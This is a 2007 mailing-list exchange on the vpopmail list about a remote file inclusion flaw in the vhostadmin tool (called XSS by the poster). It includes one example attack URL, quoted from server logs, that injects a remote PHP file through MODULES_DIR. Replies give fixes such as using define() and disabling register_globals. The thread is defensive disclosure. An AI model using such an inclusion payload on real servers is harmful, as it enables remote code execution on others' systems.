On Jan 29, 2007, at 21:52 , Shane Chrisp wrote:
I know this is not exactly vpopmail related, but as its a vpopmailrelated tool i thought others here would like to be made aware of this.I have been using vhostadmin for a while now, and have just noticed thatit is vulnerable to a xss attack which could lead to the underlying system being cracked. The problem is the $MODULES_DIR var is not beingprotected against injection of a remote path and simply accepts whateveris passed to it such ashttp://server/path/to/vhostadmin/modules/main.php? MODULES_DIR=http://remoteserver/path/to/bad/file.php?&cmd=0wn3dA quick fix is to change global.inc and change $MODULES_DIR = 'modules'; to define("MODULES_DIR", "modules"); and then change all references in any file it appears in of $MODULES_DIR to MODULES_DIR and comment out any references to global $MODULES_DIR; to //global $MODULES_DIR;There may be other issues, but this one I came accross yesterday when Inoticed the above formated url in the apacge logs. Also, we have modified some of the system ourselves, so it is entirely possible that we may be partly to blame for some or all of this, but it would certainly be worth watching out for if you are using the system. Regards Shane
Or turn off Register_global, and then MODULES_DIR would only exist in $_GET[]. I chalk this one up to a bad PHP configuration:
http://www.php.net/register_globalsWhile it would not stop attacks that could cause you to include stuff if other variables are not checked before blindly being used from the $_POST and $_GET arrays, however the attack you just mentioned is null and void.
If you are running with register_globals on, you should seriously re- consider. It will be deprecated, and I can't wait for it to finally be gone, then script writers will have to learn how to use the array's that were meant for that sort of data.
Bert JW Regeer
smime.p7s
Description: S/MIME cryptographic signature
